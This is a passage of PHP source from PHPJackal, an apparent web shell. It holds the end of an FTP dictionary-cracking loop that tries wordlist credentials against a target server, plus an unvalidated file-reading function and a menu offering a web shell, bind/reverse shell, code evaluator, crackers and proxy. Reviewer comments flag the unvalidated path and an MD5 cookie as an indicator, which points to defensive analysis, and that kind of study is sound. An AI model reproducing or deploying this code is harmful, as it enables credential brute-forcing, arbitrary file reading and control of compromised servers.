"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass
";if(!$type)break;} ftp_close($ftp); flusheR(); } echo "
Done
"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } else echo "
${t}FTP cracker:$crack"; }}
/**
 * openiT($name) - prints the file at $name.
 *
 * Files whose extension (the text after the last '.', lower-cased) is in the PHP-source list
 * go through highlight_file(); everything else is read with file_get_contents() and
 * HTML-escaped before being echoed.
 *
 * Reviewer note: $name is not validated here. NOTE(review): callers are outside this chunk;
 * given how the rest of the listing uses $_REQUEST, it is presumably request-supplied.
 */
function openiT($name){ $ext=strtolower(substr($name,strrpos($name,'.')+1)); $src=array('php','php3','php4','phps','phtml','phtm','inc'); if(in_array($ext,$src))highlight_file($name); else echo "
".htmlspecialchars(file_get_contents($name))."
"; }
/**
 * logouT() - expires the 'passw' cookie and redirects to the URL built by hlinK().
 *
 * Reviewer note: earlier in the file the 'passw' cookie is set to the unsalted MD5 of the
 * panel password, so a 32-hex-character 'passw' cookie in proxy or web logs is an indicator
 * of sessions with this panel.
 */
function logouT(){ setcookie('passw','',time()-10000); header('Location: '.hlinK()); } ?> PHPJackal
[Back] - ">[Info] - ">[File manager] - ">[Editor] - ">[Web shell] - ">[B/R shell] - ">[Safe-mode] - ">[SQL] - ">[Mailer] - ">[Evaler] - ">[Scanners] - ">[Crackers] - ">[Pr0xy] - ">[Whois] - ">[Convert] - ">[About] Logout]";?>